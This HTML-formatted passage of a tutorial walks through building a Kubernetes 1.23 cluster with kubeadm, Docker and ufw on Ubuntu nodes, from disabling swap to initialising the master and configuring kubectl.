&lt;h3 id=&#34;disable-the-swap-memory&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#disable-the-swap-memory&#34;&gt;#&lt;/a&gt; Disable the Swap Memory&lt;/h3&gt;
&lt;p&gt;The Kubernetes requires that you disable the swap memory in the host system because the kubernetes scheduler determines the best available node on which to deploy newly created pods. If memory swapping is allowed to occur on a host system, this can lead to performance and stability issues within Kubernetes&lt;/p&gt;
&lt;p&gt;You can disable the swap memory by deleting or commenting the swap entry in  &lt;code&gt;/etc/fstab&lt;/code&gt;  manually or using the  &lt;code&gt;sed&lt;/code&gt;  command&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master$ sudo swapoff -a &amp;amp;&amp;amp; sudo sed -i &lt;span class=&#34;string&#34;&gt;&amp;#x27;/ swap / s/^\(.*\)$/#\1/g&amp;#x27;&lt;/span&gt; /etc/fstab&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This command disbales the swap memory and comments out the swap entry in  &lt;code&gt;/etc/fstab&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;configure-or-disable-the-firewall&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#configure-or-disable-the-firewall&#34;&gt;#&lt;/a&gt; Configure or Disable the firewall&lt;/h3&gt;
&lt;p&gt;When running Kubernetes in an environment with strict network boundaries, such as on-premises datacenter with physical network firewalls or Virtual Networks in Public Cloud, it is useful to be aware of the ports and protocols used by Kubernetes components.&lt;/p&gt;
&lt;p&gt;The ports used by Master Node:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Direction&lt;/th&gt;
&lt;th&gt;Port Range&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;6443&lt;/td&gt;
&lt;td&gt;Kubernetes API server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;2379-2380&lt;/td&gt;
&lt;td&gt;etcd server client API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;10250&lt;/td&gt;
&lt;td&gt;Kubelet API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;10259&lt;/td&gt;
&lt;td&gt;kube-scheduler&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;10257&lt;/td&gt;
&lt;td&gt;kube-controller-manager&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The ports used by Worker Nodes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Direction&lt;/th&gt;
&lt;th&gt;Port Range&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;10250&lt;/td&gt;
&lt;td&gt;Kubelet API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;Inbound&lt;/td&gt;
&lt;td&gt;30000-32767&lt;/td&gt;
&lt;td&gt;NodePort Services&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;You can either disable the firewall or allow the ports on each node.&lt;/p&gt;
&lt;h4 id=&#34;method-1-add-firewall-rules-to-allow-the-ports-used-by-the-kubernetes-nodes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#method-1-add-firewall-rules-to-allow-the-ports-used-by-the-kubernetes-nodes&#34;&gt;#&lt;/a&gt; Method 1: Add firewall rules to allow the ports used by the Kubernetes nodes&lt;/h4&gt;
&lt;p&gt;Allow the ports used by the master node:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw allow 6443/tcp&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw allow 2379:2380/tcp&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw allow 10250/tcp&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw allow 10259/tcp&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw allow 10257/tcp&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Allow the ports used by the worker nodes:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:~$ sudo ufw allow 10250/tcp&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-worker1:~$ sudo ufw allow 30000:32767/tcp&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;method-2-disable-the-firewall&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#method-2-disable-the-firewall&#34;&gt;#&lt;/a&gt; Method 2: Disable the firewall&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt command&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw status&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Status: active&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw &lt;span class=&#34;built_in&#34;&gt;disable&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Firewall stopped and disabled on system startup&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo ufw status&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Status: inactive&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;installing-docker-engine&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#installing-docker-engine&#34;&gt;#&lt;/a&gt; Installing Docker Engine&lt;/h3&gt;
&lt;p&gt;Kubernetes requires you to install a container runtime to work correctly.There are many available options like containerd, CRI-O, Docker etc&lt;/p&gt;
&lt;p&gt;By default, Kubernetes uses the Container Runtime Interface (CRI) to interface with your chosen container runtime.If you don’t specify a runtime, kubeadm automatically tries to detect an installed container runtime by scanning through a list of known endpoints.&lt;/p&gt;
&lt;p&gt;You must install the Docker Engine on each node!&lt;/p&gt;
&lt;h4 id=&#34;1-set-up-the-repository&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#1-set-up-the-repository&#34;&gt;#&lt;/a&gt; 1- Set up the repository&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo apt update&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo apt install ca-certificates curl gnupg lsb-release&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;2-add-dockers-official-gpg-key&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#2-add-dockers-official-gpg-key&#34;&gt;#&lt;/a&gt; 2- Add Docker’s official GPG key&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo &lt;span class=&#34;built_in&#34;&gt;mkdir&lt;/span&gt; -p /etc/apt/keyrings&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;3-add-the-stable-repository-using-the-following-command&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#3-add-the-stable-repository-using-the-following-command&#34;&gt;#&lt;/a&gt; 3- Add the stable repository using the following command:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ &lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;string&#34;&gt;&amp;quot;deb [arch=&lt;span class=&#34;subst&#34;&gt;$(dpkg --print-architecture)&lt;/span&gt; signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;  &lt;span class=&#34;subst&#34;&gt;$(lsb_release -cs)&lt;/span&gt; stable&amp;quot;&lt;/span&gt; | sudo &lt;span class=&#34;built_in&#34;&gt;tee&lt;/span&gt; /etc/apt/sources.list.d/docker.list &amp;gt; /dev/null&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;4-install-the-docker-container&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#4-install-the-docker-container&#34;&gt;#&lt;/a&gt; 4- Install the docker container&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo apt update &amp;amp;&amp;amp; sudo apt install docker-ce docker-ce-cli containerd.io -y&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;5-make-sure-that-the-docker-will-work-on-system-startup&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#5-make-sure-that-the-docker-will-work-on-system-startup&#34;&gt;#&lt;/a&gt; 5- Make sure that the docker will work on system startup&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo systemctl &lt;span class=&#34;built_in&#34;&gt;enable&lt;/span&gt; --now docker &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;6-configuring-cgroup-driver&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#6-configuring-cgroup-driver&#34;&gt;#&lt;/a&gt; 6- Configuring Cgroup Driver:&lt;/h4&gt;
&lt;p&gt;The Cgroup Driver must be configured to let the kubelet process work correctly&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ &lt;span class=&#34;built_in&#34;&gt;cat&lt;/span&gt; &amp;lt;&amp;lt;&lt;span class=&#34;string&#34;&gt;EOF | sudo tee /etc/docker/daemon.json&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;#123;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;  &amp;quot;exec-opts&amp;quot;: [&amp;quot;native.cgroupdriver=systemd&amp;quot;],&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;  &amp;quot;log-driver&amp;quot;: &amp;quot;json-file&amp;quot;,&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;  &amp;quot;log-opts&amp;quot;: &amp;#123;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;    &amp;quot;max-size&amp;quot;: &amp;quot;100m&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;  &amp;#125;,&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;  &amp;quot;storage-driver&amp;quot;: &amp;quot;overlay2&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;#125;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;EOF&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;7-restart-the-docker-service-to-make-sure-the-new-configuration-is-applied&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#7-restart-the-docker-service-to-make-sure-the-new-configuration-is-applied&#34;&gt;#&lt;/a&gt; 7- Restart the docker service to make sure the new configuration is applied&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo systemctl daemon-reload &amp;amp;&amp;amp; sudo systemctl restart docker&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;installing-kubernetes-kubeadm-kubelet-and-kubectl&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#installing-kubernetes-kubeadm-kubelet-and-kubectl&#34;&gt;#&lt;/a&gt; Installing kubernetes (kubeadm, kubelet, and kubectl):&lt;/h3&gt;
&lt;p&gt;Install the following dependency required by Kubernetes on each node&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo apt install apt-transport-https&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;download-the-google-cloud-public-signing-key&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#download-the-google-cloud-public-signing-key&#34;&gt;#&lt;/a&gt; Download the Google Cloud public signing key:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo curl -fsSLo /usr/share/keyrings/kubernetes-archive-keyring.gpg https://packages.cloud.google.com/apt/doc/apt-key.gpg&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;add-the-kubernetes-apt-repository&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#add-the-kubernetes-apt-repository&#34;&gt;#&lt;/a&gt; Add the Kubernetes apt repository:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ &lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;deb [signed-by=/usr/share/keyrings/kubernetes-archive-keyring.gpg] https://apt.kubernetes.io/ kubernetes-xenial main&amp;quot;&lt;/span&gt; | sudo &lt;span class=&#34;built_in&#34;&gt;tee&lt;/span&gt; /etc/apt/sources.list.d/kubernetes.list&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;update-the-apt-package-index-and-install-kubeadm-kubelet-and-kubeclt&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#update-the-apt-package-index-and-install-kubeadm-kubelet-and-kubeclt&#34;&gt;#&lt;/a&gt; Update the apt package index and install kubeadm, kubelet, and kubeclt&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo apt update &amp;amp;&amp;amp; sudo apt install -y kubelet=1.23.1-00 kubectl=1.23.1-00 kubeadm=1.23.1-00&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;initializing-the-control-plane-node&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#initializing-the-control-plane-node&#34;&gt;#&lt;/a&gt; Initializing the control-plane node&lt;/h2&gt;
&lt;p&gt;At this point, we have 3 nodes with docker,  &lt;code&gt;kubeadm&lt;/code&gt; ,  &lt;code&gt;kubelet&lt;/code&gt; , and  &lt;code&gt;kubectl&lt;/code&gt;  installed. Now we must initialize the Kubernetes master, which will manage the whole cluster and the pods running within the cluster  &lt;code&gt;kubeadm init&lt;/code&gt;  by specifiy the address of the master node and the ipv4 address pool of the pods&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo kubeadm init --apiserver-advertise-address=192.168.1.18 --pod-network-cidr=10.1.0.0/16&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;You should wait a few minutes until the initialization is completed. The first initialization will take a lot of time if your connexion speed is slow (pull the images of the cluster components)&lt;/p&gt;
&lt;h3 id=&#34;configuring-kubectl&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#configuring-kubectl&#34;&gt;#&lt;/a&gt; Configuring kubectl&lt;/h3&gt;
&lt;p&gt;As known, the  &lt;code&gt;kubectl&lt;/code&gt;  is a command line tool for performing actions on your cluster. So we must to configure  &lt;code&gt;kubectl&lt;/code&gt; . Run the following command from your master node:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ &lt;span class=&#34;built_in&#34;&gt;mkdir&lt;/span&gt; -p &lt;span class=&#34;variable&#34;&gt;$HOME&lt;/span&gt;/.kube&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo &lt;span class=&#34;built_in&#34;&gt;cp&lt;/span&gt; -i /etc/kubernetes/admin.conf &lt;span class=&#34;variable&#34;&gt;$HOME&lt;/span&gt;/.kube/config&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ sudo &lt;span class=&#34;built_in&#34;&gt;chown&lt;/span&gt; $(&lt;span class=&#34;built_in&#34;&gt;id&lt;/span&gt; -u):$(&lt;span class=&#34;built_in&#34;&gt;id&lt;/span&gt; -g) &lt;span class=&#34;variable&#34;&gt;$HOME&lt;/span&gt;/.kube/config&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
